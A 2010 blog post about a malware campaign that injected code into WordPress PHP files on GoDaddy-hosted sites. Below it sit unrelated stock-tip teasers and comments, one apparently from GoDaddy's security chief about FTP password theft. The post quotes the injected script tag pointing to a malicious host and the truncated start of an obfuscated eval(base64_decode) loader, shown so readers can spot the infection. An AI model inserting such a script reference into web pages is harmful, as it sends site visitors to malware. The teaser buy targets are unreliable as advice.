There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="https://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!
If you’re on GoDaddy Server & hosted WordPress Website, a major malware infection is going around. Kindly check yours and get solved soon!
Related Readings and Observations
How my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.
Buy : TVS Motors : Marketcalls Buy : TVS Motors CMP : Rs43 Target : Rs 56 Time : 3months Upside : 30% approx Poitive Point : Some Positive News started flown from this company and here are some […]
Nifty and MYself Baltic Dry Index is Melting.....Crude is Sinking.....Commodities are dragging down.....Yen is Sinking......Dollar.... It is still a mystery
Iam really tired of Watching All […]
Bombay Dyeing breaks GANN Supports
Bombay Dyeing 15min charts shows that it Breaks the GANN Supports zone Rs360-362. And currently focussed towards the next support zone Rs 300-305. However Breakout above Rs […]
Flatland and Fouth Dimension Here is an video about Flatland and Mr Carl Sagan, the world famous astronomer and astrophysicist explaining to concepts of 4th dimention.
Nifty Futures – Negative Sentiment Further Extends – September Expiry Nifty Futures further extended the negative sentiment on Wednesday trading session tested an intraday low of 11437 followed by a sharp recovery. Yet another day momentum sellers controlled […]
Todd Redfoot says
September 19, 2010 at 2:05 amAn exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.
Thank you,
Todd Redfoot
Go Daddy Chief Information Security Officer
Raj says
September 19, 2010 at 3:28 amHi Rajandran R,
I guess you could have used the steps given in this link…
http://hubpages.com/hub/Godaddy-Malware-Issue-Fixed
dont know how the hell they made this good tool, but it works for sure…
We surely need some more people like these… 🙂